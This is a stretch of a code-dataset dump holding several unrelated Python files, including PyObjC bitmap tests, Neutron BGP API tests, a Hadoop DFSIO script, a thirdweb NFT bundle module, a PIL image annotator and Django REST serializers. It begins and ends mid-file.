rPlane = buffer(rPlane)
gPlane = array.array('B')
gPlane.fromlist( [y%256 for y in range(0,height) for x in range(width,0,-1)] )
gPlane = buffer(gPlane)
bPlane = array.array('B')
bPlane.fromlist( [x%256 for y in range(0,height) for x in range(0,width)] )
bPlane = buffer(bPlane)
dataPlanes = (rPlane, gPlane, bPlane, None, None)
# test planar, pre-made buffer
i1 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, YES, NSDeviceRGBColorSpace, 0, 0)
self.assertTrue(i1)
singlePlane = objc.allocateBuffer(width*height*3)
for i in range(0, width*height):
si = i * 3
if sys.version_info[0] == 2:
singlePlane[si] = rPlane[i]
singlePlane[si+1] = gPlane[i]
singlePlane[si+2] = bPlane[i]
else:
def as_byte(v):
if isinstance(v, int):
return v
else:
return ord(v)
singlePlane[si] = as_byte(rPlane[i])
singlePlane[si+1] = as_byte(gPlane[i])
singlePlane[si+2] = as_byte(bPlane[i])
dataPlanes = (singlePlane, None, None, None, None)
# test non-planar, premade buffer
i2 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
# test grey scale
greyPlane = array.array('B')
greyPlane.fromlist( [x%256 for x in range(0,height) for x in range(0,width)] )
greyPlanes = (greyPlane, None, None, None, None)
greyImage = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(greyPlanes, width, height, 8, 1, NO, YES, NSCalibratedWhiteColorSpace, width, 8)
# test planar, NSBIR allocated buffer
i3 = NSBitmapImageRep.alloc().initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(None, width, height, 8, 3, NO, YES, NSDeviceRGBColorSpace, 0, 0)
r,g,b,a,o = i3.getBitmapDataPlanes_()
self.assertTrue(r)
self.assertTrue(g)
self.assertTrue(b)
self.assertTrue(not a)
self.assertTrue(not o)
self.assertEqual(len(r), len(rPlane))
self.assertEqual(len(g), len(gPlane))
self.assertEqual(len(b), len(bPlane))
r[0:len(r)] = rPlane[0:len(rPlane)]
g[0:len(g)] = gPlane[0:len(gPlane)]
b[0:len(b)] = bPlane[0:len(bPlane)]
bitmapData = i2.bitmapData()
self.assertEqual(len(bitmapData), len(singlePlane))
try:
memoryview
except NameError:
self.assertEqual(bitmapData, singlePlane)
else:
self.assertEqual(bitmapData.tobytes(),
singlePlane)
a = array.array('L', [255]*4)
self.assertArgIsOut(NSBitmapImageRep.getPixel_atX_y_, 0)
d = i2.getPixel_atX_y_(a, 1, 1)
self.assertIs(a, d)
class TestBadCreation(TestCase):
# Redirect stderr to /dev/null for the duration of this test,
# NSBitmapImageRep will write an error message to stderr.
def setUp(self):
import os
self.duppedStderr = os.dup(2)
fp = os.open('/dev/null', os.O_RDWR)
os.dup2(fp, 2)
os.close(fp)
def tearDown(self):
import os
os.dup2(self.duppedStderr, 2)
def test_AllocInit(self):
y = NSBitmapImageRep.alloc()
try:
self.assertRaises(ValueError, y.init)
finally:
width = 256
height = 256
dataPlanes = (None, None, None, None, None)
y = y.initWithBitmapDataPlanes_pixelsWide_pixelsHigh_bitsPerSample_samplesPerPixel_hasAlpha_isPlanar_colorSpaceName_bytesPerRow_bitsPerPixel_(dataPlanes, width, height, 8, 3, NO, NO, NSDeviceRGBColorSpace, 0, 0)
def testConstants(self):
self.assertEqual(NSTIFFCompressionNone, 1)
self.assertEqual(NSTIFFCompressionCCITTFAX3, 3)
self.assertEqual(NSTIFFCompressionCCITTFAX4, 4)
self.assertEqual(NSTIFFCompressionLZW, 5)
self.assertEqual(NSTIFFCompressionJPEG, 6)
self.assertEqual(NSTIFFCompressionNEXT, 32766)
self.assertEqual(NSTIFFCompressionPackBits, 32773)
self.assertEqual(NSTIFFCompressionOldJPEG, 32865)
self.assertEqual(NSTIFFFileType, 0)
self.assertEqual(NSBMPFileType, 1)
self.assertEqual(NSGIFFileType, 2)
self.assertEqual(NSJPEGFileType, 3)
self.assertEqual(NSPNGFileType, 4)
self.assertEqual(NSJPEG2000FileType, 5)
self.assertEqual(NSImageRepLoadStatusUnknownType, -1)
self.assertEqual(NSImageRepLoadStatusReadingHeader, -2)
self.assertEqual(NSImageRepLoadStatusWillNeedAllData, -3)
self.assertEqual(NSImageRepLoadStatusInvalidData, -4)
self.assertEqual(NSImageRepLoadStatusUnexpectedEOF, -5)
self.assertEqual(NSImageRepLoadStatusCompleted, -6)
self.assertEqual(NSAlphaFirstBitmapFormat, 1 << 0)
self.assertEqual(NSAlphaNonpremultipliedBitmapFormat, 1 << 1)
self.assertEqual(NSFloatingPointSamplesBitmapFormat, 1 << 2)
self.assertIsInstance(NSImageCompressionMethod, unicode)
self.assertIsInstance(NSImageCompressionFactor, unicode)
self.assertIsInstance(NSImageDitherTransparency, unicode)
self.assertIsInstance(NSImageRGBColorTable, unicode)
self.assertIsInstance(NSImageInterlaced, unicode)
self.assertIsInstance(NSImageColorSyncProfileData, unicode)
self.assertIsInstance(NSImageFrameCount, unicode)
self.assertIsInstance(NSImageCurrentFrame, unicode)
self.assertIsInstance(NSImageCurrentFrameDuration, unicode)
self.assertIsInstance(NSImageLoopCount, unicode)
self.assertIsInstance(NSImageGamma, unicode)
self.assertIsInstance(NSImageProgressive, unicode)
self.assertIsInstance(NSImageEXIFData, unicode)
self.assertIsInstance(NSImageFallbackBackgroundColor, unicode)
def testTiffCompression(self):
lst, nr = NSBitmapImageRep.getTIFFCompressionTypes_count_(None, None)
self.assertIsInstance(lst, tuple)
self.assertIsInstance(nr, (int, long))
self.assertEqual(len(lst), nr)
self.assertNotEqual(len(lst), 0)
self.assertIsInstance(lst[0], (int, long))
def testMethods(self):
self.assertResultIsBOOL(NSBitmapImageRep.isPlanar)
self.assertResultIsBOOL(NSBitmapImageRep.canBeCompressedUsing_)
self.assertArgIsBOOL(NSBitmapImageRep.incrementalLoadFromData_complete_, 1)
self.assertArgIsOut(NSBitmapImageRep.getCompression_factor_, 0)
self.assertArgIsOut(NSBitmapImageRep.getCompression_factor_, 1)
if __name__ == '__main__':
main( )
| 2.109375 | 2 |
neutron/tests/api/test_bgp_speaker_extensions.py | wwriverrat/neutron | 1 | 12789324 | # Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest import config
from tempest import test
from tempest_lib import exceptions as lib_exc
from neutron.tests.api import base
from tempest.common import tempest_fixtures as fixtures
CONF = config.CONF
class BgpSpeakerTestJSONBase(base.BaseAdminNetworkTest):
default_bgp_speaker_args = {'local_as': '1234',
'ip_version': 4,
'name': 'my-bgp-speaker',
'advertise_floating_ip_host_routes': True,
'advertise_tenant_networks': True}
default_bgp_peer_args = {'remote_as': '4321',
'name': 'my-bgp-peer',
'peer_ip': '192.168.1.1',
'auth_type': '<PASSWORD>', 'password': '<PASSWORD>'}
@classmethod
def resource_setup(cls):
super(BgpSpeakerTestJSONBase, cls).resource_setup()
if not test.is_extension_enabled('bgp_speaker', 'network'):
msg = "BGP Speaker extension is not enabled."
raise cls.skipException(msg)
cls.ext_net_id = CONF.network.public_network_id
def create_bgp_speaker(self, auto_delete=True, **args):
data = {'bgp_speaker': args}
bgp_speaker = self.admin_client.create_bgp_speaker(data)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
if auto_delete:
self.addCleanup(self.delete_bgp_speaker, bgp_speaker_id)
return bgp_speaker
def create_bgp_peer(self, **args):
bgp_peer = self.admin_client.create_bgp_peer({'bgp_peer': args})
bgp_peer_id = bgp_peer['bgp-peer']['id']
self.addCleanup(self.delete_bgp_peer, bgp_peer_id)
return bgp_peer
def update_bgp_speaker(self, id, **args):
data = {'bgp_speaker': args}
return self.admin_client.update_bgp_speaker(id, data)
def delete_bgp_speaker(self, id):
return self.admin_client.delete_bgp_speaker(id)
def get_bgp_speaker(self, id):
return self.admin_client.get_bgp_speaker(id)
def create_bgp_speaker_and_peer(self):
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_peer = self.create_bgp_peer(**self.default_bgp_peer_args)
return (bgp_speaker, bgp_peer)
def delete_bgp_peer(self, id):
return self.admin_client.delete_bgp_peer(id)
def add_bgp_peer(self, bgp_speaker_id, bgp_peer_id):
return self.admin_client.add_bgp_peer_with_id(bgp_speaker_id,
bgp_peer_id)
def remove_bgp_peer(self, bgp_speaker_id, bgp_peer_id):
return self.admin_client.remove_bgp_peer_with_id(bgp_speaker_id,
bgp_peer_id)
def delete_address_scope(self, id):
return self.admin_client.delete_address_scope(id)
class BgpSpeakerTestJSON(BgpSpeakerTestJSONBase):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
Create bgp-speaker
Delete bgp-speaker
Create bgp-peer
Update bgp-peer
Delete bgp-peer
"""
@test.idempotent_id('df259771-7104-4ffa-b77f-bd183600d7f9')
def test_delete_bgp_speaker(self):
bgp_speaker = self.create_bgp_speaker(auto_delete=False,
**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.delete_bgp_speaker(bgp_speaker_id)
self.assertRaises(lib_exc.NotFound,
self.get_bgp_speaker,
bgp_speaker_id)
@test.idempotent_id('81d9dc45-19f8-4c6e-88b8-401d965cd1b0')
def test_create_bgp_peer(self):
self.create_bgp_peer(**self.default_bgp_peer_args)
@test.idempotent_id('6ade0319-1ee2-493c-ac4b-5eb230ff3a77')
def test_add_bgp_peer(self):
bgp_speaker, bgp_peer = self.create_bgp_speaker_and_peer()
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
bgp_peer_id = bgp_peer['bgp-peer']['id']
self.add_bgp_peer(bgp_speaker_id, bgp_peer_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
bgp_peers_list = bgp_speaker['bgp-speaker']['peers']
self.assertEqual(1, len(bgp_peers_list))
self.assertTrue(bgp_peer_id in bgp_peers_list)
@test.idempotent_id('f9737708-1d79-440b-8350-779f97d882ee')
def test_remove_bgp_peer(self):
bgp_peer = self.create_bgp_peer(**self.default_bgp_peer_args)
bgp_peer_id = bgp_peer['bgp-peer']['id']
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.add_bgp_peer(bgp_speaker_id, bgp_peer_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
bgp_peers_list = bgp_speaker['bgp-speaker']['peers']
self.assertTrue(bgp_peer_id in bgp_peers_list)
bgp_speaker = self.remove_bgp_peer(bgp_speaker_id, bgp_peer_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
bgp_peers_list = bgp_speaker['bgp-speaker']['peers']
self.assertTrue(not bgp_peers_list)
@test.idempotent_id('23c8eb37-d10d-4f43-b2e7-6542cb6a4405')
def test_add_gateway_network(self):
self.useFixture(fixtures.LockFixture('gateway_network_binding'))
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.admin_client.add_bgp_gateway_network(bgp_speaker_id,
self.ext_net_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
network_list = bgp_speaker['bgp-speaker']['networks']
self.assertEqual(1, len(network_list))
self.assertTrue(self.ext_net_id in network_list)
@test.idempotent_id('6cfc7137-0d99-4a3d-826c-9d1a3a1767b0')
def test_remove_gateway_network(self):
self.useFixture(fixtures.LockFixture('gateway_network_binding'))
bgp_speaker = self.create_bgp_speaker(**self.default_bgp_speaker_args)
bgp_speaker_id = bgp_speaker['bgp-speaker']['id']
self.admin_client.add_bgp_gateway_network(bgp_speaker_id,
self.ext_net_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
networks = bgp_speaker['bgp-speaker']['networks']
self.assertTrue(self.ext_net_id in networks)
self.admin_client.remove_bgp_gateway_network(bgp_speaker_id,
self.ext_net_id)
bgp_speaker = self.admin_client.get_bgp_speaker(bgp_speaker_id)
network_list = bgp_speaker['bgp-speaker']['networks']
self.assertTrue(not network_list)
| 1.554688 | 2 |
supports/integration-test/dfsio_create_file.py | ypang2017/Test | 2 | 12789325 | <reponame>ypang2017/Test<gh_stars>1-10
import sys
from util import *
def create_file_DFSIO(num):
"""
Please use this script in namenode
Each time create 10K * 2 files (10K in io_data and 10K in io_control).
Then, move these data to TEST_DIR.
"""
dfsio_cmd = "hadoop jar /usr/lib/hadoop-mapreduce/hadoop-" + \
"mapreduce-client-jobclient-*-tests.jar TestDFSIO " + \
"-write -nrFiles 10000 -fileSize 0KB"
for i in range(num):
subprocess.call(dfsio_cmd)
subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_control " +
TEST_DIR + str(i) + "_control")
subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_data " +
TEST_DIR + str(i) + "_data")
if __name__ == '__main__':
num = 50
try:
num = int(sys.argv[1])
except ValueError:
print "Usage: python dfsio_create_file [num]"
except IndexError:
pass
create_file_DFSIO(num)
| 2.46875 | 2 |
thirdweb/modules/bundle.py | princetonwong/python-sdk | 1 | 12789326 | """
Interact with the Bundle module of the app. Previously `collection`.
"""
from typing import List
from thirdweb_web3 import Web3
from ..abi.erc20 import ERC20
from ..abi.nft import SignatureMint721 as NFT
from ..abi.nft_collection import NFTCollection as NFTBundle
from ..types.bundle import BundleMetadata, CreateBundleArg, MintBundleArg
from ..types.metadata import Metadata
from ..types.nft import NftMetadata
from .base import BaseModule
class BundleModule(BaseModule):
"""
Interact with the Bundle module of the app. Previously `collection`.
"""
address: str
"""
Address of the module
"""
__abi_module: NFTBundle
def __init__(self, address: str, client: Web3):
"""
:param address: The address of the module
:param client: Web3 client
Initializes the module
"""
super().__init__()
self.address = address
self.__abi_module = NFTBundle(client, address)
def get(self, token_id: int) -> BundleMetadata:
"""
:param token_id: The token id to get
:return: Metadata of the bundle
Get the metadata for a given token id
"""
uri = self.__abi_module.uri.call(token_id)
meta_str = self.get_storage().get(uri)
meta: NftMetadata = NftMetadata.from_json(meta_str)
meta.id = token_id
return BundleMetadata(
metadata=meta,
supply=self.__abi_module.total_supply.call(token_id),
creator=self.__abi_module.creator.call(token_id),
id=token_id
)
def get_all(self) -> List[BundleMetadata]:
'''
:return: A list of metadata
Returns all the bundles in the contract
'''
return [self.get(i) for i in range(self.__abi_module.next_token_id.call())]
def balance_of(self, address: str, token_id: int) -> int:
'''
:param address: The address to check
:param token_id: The token id to check
:return: The balance
Returns the balance for a given token at owned by a specific address
'''
return self.__abi_module.balance_of.call(address, token_id)
def balance(self, token_id: int) -> int:
'''
:param token_id: The token id to check
:return: The balance
Returns the balance for a given token id for the current signers address
'''
return self.__abi_module.balance_of.call(
self.get_signer_address(),
token_id
)
def is_approved(self, address: str, operator: str) -> bool:
"""
:param address: The address to check
:param operator: The operator to check
:return: True if approved, False otherwise
"""
return self.__abi_module.is_approved_for_all.call(address, operator)
def set_approval(self, operator: str, approved: bool = True):
"""
:param operator: The operator to set approval for
:param approved: True if you want to approve, False otherwise
"""
self.execute_tx(self.__abi_module.set_approval_for_all.build_transaction(
operator, approved, self.get_transact_opts()
))
def transfer(self, to_address: str, token_id: int, amount: int):
"""
:param to_address: The address to transfer to
:param token_id: The token id to transfer
:param amount: The amount to transfer
Transfers a token to a new owner
"""
self.execute_tx(self.__abi_module.safe_transfer_from.build_transaction(
self.get_signer_address(), to_address, token_id, amount, "", self.get_transact_opts()
))
def create(self, metadata: Metadata) -> BundleMetadata:
"""
:param metadata: The metadata to be stored
:return: Metadata of the bundle
Creates a bundle.
"""
return self.create_batch([metadata])[0]
def create_batch(self, metas: List[Metadata]) -> List[BundleMetadata]:
"""
:param metas: The metadata to be stored
:return: List of metadatas of the bundles
Creates a bundle of NFTs
"""
meta_with_supply = [CreateBundleArg(
metadata=m, supply=0) for m in metas]
return self.create_and_mint_batch(meta_with_supply)
def create_and_mint(self, meta_with_supply: CreateBundleArg) -> BundleMetadata:
"""
:param meta_with_supply: Metadata with supply
:return: A metadata with supply
Create a bundle and mint it to the current signer address
"""
return self.create_and_mint_batch([meta_with_supply])[0]
def create_and_mint_batch(self, meta_with_supply: List[CreateBundleArg]) -> List[BundleMetadata]:
"""
:param meta_with_supply: A list of metadata with supply
:return: A list of metadata with supply
Creates bundles and mints them to the current signer address
"""
if len(meta_with_supply) == 0:
raise Exception("No metadata supplied")
uris = [self.upload_metadata(meta.metadata)
for meta in meta_with_supply]
supplies = [a.supply for a in meta_with_supply]
receipt = self.execute_tx(self.__abi_module.create_native_tokens.build_transaction(
self.get_signer_address(), uris, supplies, "", self.get_transact_opts()
))
result = self.__abi_module.get_native_tokens_event(
tx_hash=receipt.transactionHash.hex())
token_ids = result[0]['args']['tokenIds']
return [self.get(i) for i in token_ids]
def create_with_token(self, token_contract: str, token_amount: int, metadata: dict = None):
"""
:param token_contract: The address of the token contract
:param token_amount: The amount of tokens to mint
:param metadata: The metadata to be stored
WIP: This method is not yet complete.
"""
if token_contract == "" or token_contract is None or not self.get_client().isAddress(token_contract):
raise Exception("token_contract not a valid address")
if token_amount <= 0:
raise Exception("token_amount must be greater than 0")
uri = self.upload_metadata(metadata)
erc20 = ERC20(self.get_client(), token_contract)
allowance = erc20.allowance.call(
self.get_signer_address(), self.address)
if allowance < token_amount:
tx = erc20.increase_allowance.build_transaction(self.address,
token_amount,
self.get_transact_opts())
self.execute_tx(tx)
self.execute_tx(self.__abi_module.wrap_erc20.build_transaction(
token_contract, token_amount, token_amount, uri, self.get_transact_opts()
))
def create_with_nft(self, token_contract: str, token_id: int, metadata):
"""
:param token_contract: The address of the token contract
:param token_id: The id of the token
:param metadata: The metadata to be stored
WIP: This method is not yet complete.
"""
asset = NFT(self.get_client(), token_contract)
approved = asset.is_approved_for_all.call(
self.get_signer_address(), self.address)
if not approved:
is_token_approved = asset.get_approved.call(
token_id).lower() == self.address.lower()
if not is_token_approved:
self.execute_tx(asset.set_approval_for_all.build_transaction(
self.address, True, self.get_transact_opts()))
uri = self.upload_metadata(metadata)
self.execute_tx(self.__abi_module.wrap_erc721.build_transaction(
token_contract, token_id, uri, self.get_transact_opts()
))
def create_with_erc721(self, token_contract: str, token_id: int, metadata):
"""
:param token_contract: The address of the token contract
:param token_id: The id of the token
:param metadata: The metadata to be stored
WIP: This method is not yet complete. Same as create_with_nft()
"""
return self.create_with_nft(token_contract, token_id, metadata)
def create_with_erc20(self, token_contract: str, token_amount: int, metadata):
"""
:param token_contract: The address of the token contract
:param token_amount: The amount of tokens to mint
:param metadata: The metadata to be stored
WIP: This method is not yet complete. Same as create_with_token()
"""
return self.create_with_token(token_contract, token_amount, metadata)
def mint(self, args: MintBundleArg):
"""
:param args: The arguments for the mint
Mints a bundle to the current signer address
"""
self.mint_to(self.get_signer_address(), args)
def mint_to(self, to_address: str, arg: MintBundleArg):
"""
:param to_address: The address to mint to
:param arg: The arguments for the mint
Mints a bundle to the given address
"""
self.execute_tx(self.__abi_module.mint.build_transaction(
to_address, arg.token_id, arg.amount, "", self.get_transact_opts()
))
def mint_batch(self, args: List[MintBundleArg]):
"""
:param args: The arguments for the mint
Mints a list of bundles to the current signer address
"""
self.mint_batch_to(self.get_signer_address(), args)
def mint_batch_to(self, to_address, args: List[MintBundleArg]):
"""
:param to_address: The address to mint to
:param args: The arguments for the mint
:return: A list of minted bundles
Mints a list of bundles to the given address
"""
ids = [a.token_id for a in args]
amounts = [a.amount for a in args]
tx = self.__abi_module.mint_batch.build_transaction(
to_address, ids, amounts, self.get_transact_opts())
self.execute_tx(tx)
def burn(self, args: MintBundleArg):
"""
:param args: The arguments for the burn
Burns a bundle from the current signer address
"""
self.burn_from(self.get_signer_address(), args)
def burn_batch(self, args: List[MintBundleArg]):
"""
:param args: List of the arguments to burn
Burns a list of bundles from the current signer address
"""
self.burn_batch_from(self.get_signer_address(), args)
def burn_from(self, account: str, args: MintBundleArg):
"""
:param account: The account to burn from
:param args: The arguments for the burn
Burns a bundle from the given account
"""
self.execute_tx(self.__abi_module.burn.build_transaction(
account, args.token_id, args.amount, self.get_transact_opts()
))
def burn_batch_from(self, account: str, args: List[MintBundleArg]):
"""
:param account: The account to burn from
:param args: The arguments for the burn
Burns a list of bundles from the given account
"""
self.execute_tx(self.__abi_module.burn_batch.build_transaction(
account, [i.id for i in args], [
i.amount for i in args], self.get_transact_opts()
))
def transfer_from(self, from_address: str, to_address: str, args: MintBundleArg):
"""
:param from_address: The account to transfer from
:param to_address: The address to transfer to
:param args: The arguments for the transfer
Transfers a bundle from the given account to the given address
"""
self.execute_tx(self.__abi_module.safe_transfer_from.build_transaction(
from_address, to_address, args.token_id, args.amount, "", self.get_transact_opts()
))
def transfer_batch_from(self, from_address: str, to_address: str, args):
"""
:param from_address: The account to transfer from
:param to_address: The address to transfer to
:param args: The arguments for the transfer
Transfers a list of bundles from the given account to the given address
"""
self.execute_tx(self.__abi_module.safe_batch_transfer_from.build_transaction(
from_address, to_address, args.token_id, args.amount, "", self.get_transact_opts()
))
def set_royalty_bps(self, amount: int):
"""
:param amount: The amount of BPS to set
Sets the royalty BPS
"""
self.execute_tx(self.__abi_module.set_royalty_bps.build_transaction(
amount, self.get_transact_opts()
))
def get_abi_module(self) -> NFTBundle:
"""
:return: The ABI module
Returns the ABI module
"""
return self.__abi_module
| 2.34375 | 2 |
src/kep.py | Nyhilo/kep | 0 | 12789327 | # Module imports
from sys import argv as args
from datetime import datetime
# Local imports
# Parsing objects0
class file:
_date_format = "%Y-%m-%d %H:%M:%S"
def __init__(title,
date_created=None,
date_modified=None,
tags=[],
files=[]):
self.title = title
self.date_created = date_created
self.date_modified = date_modified
self.tags = tags
self.files = files
def get_default_header(self):
header = ""
if self.title:
header += f"Title: {title}\n"
if self.date_created is not None:
d = date_created.strftime(self._date_format)
header += f"Date Created: {d}\n"
if self.date_modified is not None:
d = date_modified.strftime(self._date_format)
header += f"Date Modified: {d}\n"
if len(self.tags) > 0:
t = " ".join(self.tags)
header += f"Tags: {t}\n"
if len(self.files) > 0:
t = " ".join(self.files)
header += f"Files: {t}\n"
header += "-----\n\n"
return header
class Kep:
@classmethod
def list(self, subfolder="./"):
pass
@classmethod
def open(self, assetname, location):
pass
@classmethod
def read(self, location, assetname=None):
if assetname is None:
assetname = location.split('/')[-1]
location = location.split('/')[:-1].join('/')
if __name__ == '__main__':
# Equivalent to `kep list`
if len(args) == 1:
Kep.list()
# Single argument tasks
if len(args) == 2:
if args[1].lower() == "list":
Kep.list()
#...
# Defaults to kep open args[1] ./
Kep.Open(args[1], "./")
# Two argument tasks
if len(args) == 3:
# Built-in tasks
if args[1].lower() == "list":
Kep.list(args[2])
if args[1].lower() == "read":
Kep.read(args[2])
#...
# Default to kep open args[1] args[2]
Kep.Open(args[1], args[2])
| 3 | 3 |
pluginsmanager/model/system/system_effect_builder.py | SpotlightKid/PluginsManager | 9 | 12789328 | <reponame>SpotlightKid/PluginsManager<gh_stars>1-10
# Copyright 2017 SrMouraSilva
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pluginsmanager.model.system.system_effect import SystemEffect
class SystemEffectBuilder(object):
"""
Automatic system physical ports detection.
Maybe the midi ports not will recognize. In these cases,
you need to start `a2jmidid`_ to get MIDI-ALSA ports automatically
mapped to JACK-MIDI ports.
.. _a2jmidid: http://manual.ardour.org/setting-up-your-system/setting-up-midi/midi-on-linux/
:param JackClient jack_client: :class:`.JackClient` instance that will get the information to
generate :class:`.SystemEffect`
"""
def __init__(self, jack_client):
self.client = jack_client
def build(self):
inputs = (port.shortname for port in self.client.audio_inputs)
outputs = (port.shortname for port in self.client.audio_outputs)
midi_inputs = (port.shortname for port in self.client.midi_inputs)
midi_outputs = (port.shortname for port in self.client.midi_outputs)
return SystemEffect('system', outputs, inputs, midi_outputs, midi_inputs)
| 2.09375 | 2 |
omnipack/image/image_annotator.py | FrankLeeeee/powerpack | 0 | 12789329 | from PIL import Image, ImageDraw, ImageFont
class ImageAnnotator(object):
def __init__(self,
img_path: str,
font: str = None,
font_size: int = 5):
assert isinstance(img_path, str)
self._img = Image.open(img_path).convert('RGBA')
self._img_draw = ImageDraw.Draw(self._img)
if font is None:
self._font = None
else:
assert isinstance(font, str)
self._font = ImageFont.truetype(font, font_size)
def image(self):
return self._img.convert('RGB')
def save(self, img_path):
self._img.convert('RGB').save(img_path)
def draw_line(self,
points: list,
fill: str = None,
width: int = 1):
"""
Draw a line on image
"""
assert isinstance(points, (list, tuple)) and len(points) == 2
for pair in points:
assert isinstance(pair, tuple) and len(pair) == 2
self._img_draw.line(points, fill, width)
def draw_rectangle(self,
points: list,
outline: str = None,
width: int = 1,
text: str = None,
text_fill: str = None):
"""
Draw detection bounding box with text
"""
assert isinstance(points, (list, tuple))
assert len(points) == 2 or len(points) == 4
for pair in points:
assert len(pair) == 2
if len(points) == 4:
points = [points[0], points[2]]
self._img_draw.rectangle(points, outline=outline, width=width)
if text is not None:
assert isinstance(text, str)
text_points = (points[0][0], points[1][1])
self.draw_text(points=text_points,
text=text,
fill=text_fill)
def draw_polygon(self,
points: list,
outline: str = None,
width: int = 1,
text: str = None,
text_fill: str = None):
"""
Draw polygon with text
"""
assert isinstance(points, (tuple, list)) and len(points) > 2
for pair in points:
assert isinstance(pair, tuple) and len(pair) == 2
for i in range(len(points)):
line_pts = (points[i], points[(i+1) % len(points)])
self.draw_line(points=line_pts,
fill=outline,
width=width
)
if text is not None:
assert isinstance(text, str)
self.draw_text(points=points[0],
text=text,
fill=text_fill)
def draw_text(self,
points: tuple,
text: str,
fill: str = None,
):
"""
Draw text on image
"""
assert isinstance(points, tuple) and len(points) == 2
self._img_draw.text(points, text, font=self._font, fill=fill)
| 3.234375 | 3 |
library/tests/test_fx.py | pimoroni/plasma | 9 | 12789330 | import pytest
def test_fx_cycle(argv, GPIO):
"""Test that set_sequence supports the output of a PlasmaFX Sequence"""
from plasma import auto
from plasma.apa102 import PlasmaAPA102
from plasmafx import Sequence
from plasmafx.plugins import FXCycle
sequence = Sequence(10)
sequence.set_plugin(0, FXCycle())
plasma = auto("APA102:14:15:pixel_count=10")
plasma.set_sequence(sequence.get_pixels())
assert isinstance(plasma, PlasmaAPA102) | 2.0625 | 2 |
meeting/serializers.py | ttppren-github/MeetingSample-Backend | 7 | 12789331 | from rest_framework import serializers
from meeting.models import Meeting
class BaseSerializer(serializers.Serializer):
def create(self, validated_data):
pass
def update(self, instance, validated_data):
pass
class NewMeetingIn(BaseSerializer):
name = serializers.CharField(max_length=128)
begin_at = serializers.DateTimeField()
end_at = serializers.DateTimeField()
mute_type = serializers.ChoiceField(choices=Meeting.MuteType.choices, required=False)
password = serializers.CharField(required=False)
class NewMeetingOut(serializers.ModelSerializer):
number = serializers.SerializerMethodField()
class Meta:
model = Meeting
fields = ('number', 'created')
def get_number(self, obj):
return obj.call_number
class BaseMeetingOut(BaseSerializer):
success = serializers.BooleanField()
class MeetingInfoIn(BaseSerializer):
number = serializers.IntegerField(help_text='Call number of meeting')
class MeetingInfoOut(serializers.ModelSerializer):
owner_id = serializers.SerializerMethodField()
owner_name = serializers.SerializerMethodField()
number = serializers.SerializerMethodField()
class Meta:
model = Meeting
fields = ('name', 'number', 'password', 'owner_name', 'owner_id', 'status', 'begin_at', 'end_at')
def get_owner_name(self, obj):
if obj.owner is None:
return None
return obj.owner.username
def get_owner_id(self, obj):
if obj.owner is None:
return None
return obj.owner.id
def get_number(self, obj):
return obj.call_number
class MeetingListIn(BaseSerializer):
beginAt = serializers.DateTimeField(required=False, help_text='Time with zone, etc: 2021-08-12T07:56:41+08:00')
endAt = serializers.DateTimeField(required=False)
class DelMeetingIn(BaseSerializer):
meetings = serializers.ListField(child=serializers.IntegerField(), help_text="list of meeting' number to delete")
class JoinMeetingIn(BaseSerializer):
number = serializers.IntegerField()
password = serializers.CharField(required=False)
class MeetingIn(BaseSerializer):
number = serializers.IntegerField()
class JoinMeetingOut(BaseSerializer):
token = serializers.CharField()
app_key = serializers.CharField()
room_id = serializers.IntegerField()
share_user_id = serializers.IntegerField()
share_user_token = serializers.CharField()
is_breakout = serializers.BooleanField(default=False)
| 2.140625 | 2 |
kachery/steady_download_and_compute_hash.py | flatironinstitute/kachery | 8 | 12789332 | import string
import random
import hashlib
import os
# import requests
import urllib
from typing import Union
import time
def steady_download_and_compute_hash(url: str, algorithm: str, target_path: str) -> str:
remote = urllib.request.urlopen(url)
str0 = ''.join(random.sample(string.ascii_lowercase, 8))
path_tmp = target_path + '.tmp.' + str0
hh = getattr(hashlib, algorithm)()
